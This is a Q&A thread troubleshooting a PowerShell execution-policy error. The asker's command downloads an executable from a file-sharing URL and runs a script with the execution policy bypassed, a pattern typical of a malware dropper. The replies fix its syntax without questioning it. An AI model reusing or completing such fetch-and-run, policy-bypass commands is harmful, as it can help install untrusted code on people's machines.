# Command prompt/powershell positional parameter cannot be found error

Tags: windows, powershell

```
Get-ExecutionPolicy : A positional parameter cannot be found that accepts argument 'ByPass'.
```

That's the error I get when I try to run the command :

```
cd / & mkdir win & cd win & echo (wget 'https://alterupload.com/?t7p0e1rh01' -OutFile a.exe) > b.PS1 &powershell ExecutionPolicy CurrentUser ByPass -File b.ps1"
```

Not really sure what to do about this one, I'm running windows 10 anniversary edition

Answer (score 0, accepted):

You need to use `&powershell -ExecutionPolicy bypass`, you don't need to set the scope for the execution policy, as this policy will work only for this powershell.exe, not apply globally to system.

Comment: @Cosmonaut Even if more cryptic the parameters may be abreviated as long they are uniquily identifiable, so `powershell -ex by -nol -noe -nop` is equivalent to `powershell -executionpolicy bypass -nologo -noexit -noprofile`

Answer (score -2):

My suggestion would be to just use `Set-ExecutionPolicy Bypass -Scope Process -Force`. It's hard to go wrong with the classics.

Comment: Thanks! It fixed that issue, but another issue has appeared

Comment: It returns this: Get-ExecutionPolicy : A positional parameter cannot be found that accepts argument 'CurrentUser'.

Comment: Don't type current user into the execution policy bypass. It isn't necessary, as the system defaults to the current user anyways.

Comment: Results in: Get-ExecutionPolicy : A positional parameter cannot be found that accepts argument 'ByPass'.

Comment: Bypass must be spelled Bypass, never ByPass